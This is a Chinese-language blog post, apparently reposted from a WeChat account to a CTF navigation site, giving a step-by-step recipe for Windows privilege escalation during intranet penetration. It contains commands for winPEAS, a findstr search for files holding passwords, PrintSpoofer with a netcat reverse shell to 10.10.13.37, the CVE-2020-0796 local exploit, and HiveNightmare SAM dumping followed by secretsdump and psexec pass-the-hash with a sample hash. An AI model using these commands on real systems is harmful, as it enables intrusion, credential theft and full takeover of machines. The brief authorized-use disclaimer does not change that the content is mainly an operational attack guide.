CTF导航 CTF导航

内网渗透 常用windows提权方法1

渗透技巧 1年前 (2022) admin
875 0 0

0x01 阅读须知

鸡哥安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!

0x02 漏洞复现

1.提权辅助工具winpeas.exe,以下为使用方法

1.下载地址:https://github.com/carlospolop/PEASS-ng2.WinPEAS.exe 的目标是在 Windows 环境中搜索可能的权限提升路径,需要目标系统(.Net >= 4.5.2)环境,支持打印输出颜色。3.使用方法: ①winPEASany.exe log=result.txt //检查所有并打印 ②使用自带notepad打开result.txt并改为ANSI编码 //不然中文会显示乱码type result即可

内网渗透 常用windows提权方法1

2.windows查找文件内容有 password 的文件:

findstr /si password *.txt *.xml *.docx *.ini

内网渗透 常用windows提权方法1

3.PrintSpoofer提权

1.下载地址https://github.com/itm4n/PrintSpoofer2.影响版本Windows 10和Windows Service 2016/20193.提权命令PrintSpoofer64.exe -i -c cmd 或者通过nc进行反弹shell PrintSpoofer.exe -c "C:TOOLSnc.exe 10.10.13.37 1337 -e cmd" nc.exe -l -p 1337

内网渗透 常用windows提权方法1

4.CVE-2020-0796提权

1.下载地址https://github.com/danigargu/CVE-2020-0796/releases/tag/v1.02.影响版本Windows 10 Version 1903 for 32-bit SystemsWindows 10 Version 1903 for ARM64-based SystemsWindows 10 Version 1903 for x64-based SystemsWindows 10 Version 1909 for 32-bit SystemsWindows 10 Version 1909 for ARM64-based SystemsWindows 10 Version 1909 for x64-based SystemsWindows Server, version 1903 (Server Core installation)Windows Serverversion 1909 (Server Core installation)3.提权命令,即可得到system权限cve-2020-0796-local.exe

内网渗透 常用windows提权方法1

5.CVE-2021-36934提权

1.下载地址https://github.com/GossiTheDog/HiveNightmare/releases/download/0.5/HiveNightmare.exe 作者:东塔网络安全 https://www.bilibili.com/read/cv12586737 出处:bilibili2.影响版本Windows 10和Windows Service 2016/2019以及输入icacls c:windowssystem32configsam命令显示为BUILTINUsers:(I)(RX)3.提权命令.HiveNightmare.exe //导出SAM-haxx以及SYSTEM-haxxSECURITY-haxx三个文件.python3 secretsdump.py -sam SAM-2022-09-15 -system SYSTEM-2022-09-15 -security SECURITY-2022-09-15 LOCAL //生成hash  ③.python3 psexec.py -hashes aad3b435b51404ee2ad3b435b51404ee:b4f38c38404c022912ffc78fa90bc681 xx@192.168.1.8 cmd.exe //连接即可  ④.虚拟机则需要如下步骤才可导出SAM:右键点击此电脑-》属性-》系统保护-》配置-》启用系统保护-》创建”设置一个test还原点

内网渗透 常用windows提权方法1

网络安全神兵利器分享
网络安全漏洞N/0day分享
    加入星球请扫描下方二维码,更多精,敬请期待!
???

内网渗透 常用windows提权方法1


1个内网渗透 常用windows提权方法11朵内网渗透 常用windows提权方法15毛钱

天天搬砖的小M

能不能吃顿好的

就看你们的啦

内网渗透 常用windows提权方法1

原文始发于微信公众号(鸡哥的内网渗透之路):内网渗透 常用windows提权方法1

版权声明:admin 发表于 2022年11月14日 下午3:33。
转载请注明:内网渗透 常用windows提权方法1 | CTF导航

相关文章

深度学习数据库触发器后门(案例精讲)
admin
148
每日安全动态推送(07-01)
admin
679
每周蓝军技术推送(2022.4.9-4.15)
admin
749
弈 – Codeql 自动运行和项目监控工具
admin
419
参加了多次攻防演练后,不知你的蓝队能否检测这些勒索组织TTPs!
admin
326
php(phar)反序列化漏洞及各种绕过姿势
admin
473

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

Vulnerabilities across keyboard apps reveal keystrokes to network eavesdroppers
0
allowRunningInsecureContent | Electron 安全
0
VM逆向,一篇就够了
0
先知安全沙龙(西安站) – 浅谈XSS漏洞挖掘与构造思路
0
浅谈API漏洞挖掘
0
A Detailed Guide on Pwncat
0
geoserver代码审计
0
代理(ATT&CK篇)
0
CVE-2024-24576 Windows 下多语言命令注入漏洞分析
0
Ray OS 2.6.3 Command Injection
0